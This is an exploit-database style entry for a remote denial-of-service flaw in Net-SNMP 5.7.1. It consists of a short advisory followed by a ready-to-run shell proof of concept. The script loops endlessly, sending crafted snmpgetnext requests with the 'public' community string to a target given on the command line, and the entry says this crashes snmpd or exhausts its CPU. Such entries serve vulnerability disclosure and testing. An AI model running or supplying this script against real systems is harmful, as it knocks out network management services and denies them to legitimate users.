source: https://www.securityfocus.com/bid/64048/info
Net-SNMP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the SNMPD to crash, exhaust CPU resources or trigger infinite loop; denying service to legitimate users.
Net-SNMP 5.7.1 is vulnerable; other versions may also be affected.
#!/bin/sh
SNMPOPTS="-v1 -c public"
LUCKYSNMPD=$1
SNMPWALKCMD="snmpwalk $SNMPOPTS $LUCKYSNMPD"
SNMPGETCMD="snmpget $SNMPOPTS $LUCKYSNMPD"
SNMPGETNEXTCMD="snmpgetnext $SNMPOPTS $LUCKYSNMPD"
TESTMIB=.1.3.6.1.4.1.8072.2
TESTTELEM=$TESTMIB.5
TESTHDD=$TESTMIB.1.1.2
while true
do
$SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.4.2 $TESTTELEM.1.1.4.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.5 $TESTTELEM.1.1.2.3 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.1 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.1.2 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.3.3 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1
$SNMPGETNEXTCMD $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.8.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.4.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.6.1 $TESTTELEM.1.1.2.1 $TESTTELEM.1.1.7.1 $TESTTELEM.1.1.2.1
for i in 1 2 3
do
$SNMPGETNEXTCMD $TESTTELEM.1.1.3 $TESTTELEM.1.1.2 $TESTTELEM.1.1.4 $TESTTELEM.1.1.2 $TESTHDD.4 $TESTHDD.5 $TESTHDD.7 $TESTHDD.5 $TESTHDD.2 $TESTHDD.1 $TESTHDD.4 $TESTHDD.1 $TESTHDD.7 $TESTHDD.1 $TESTHDD.8 $TESTHDD.1 $TESTHDD.14 $TESTHDD.1 $TESTHDD.13 $TESTHDD.1
done
done
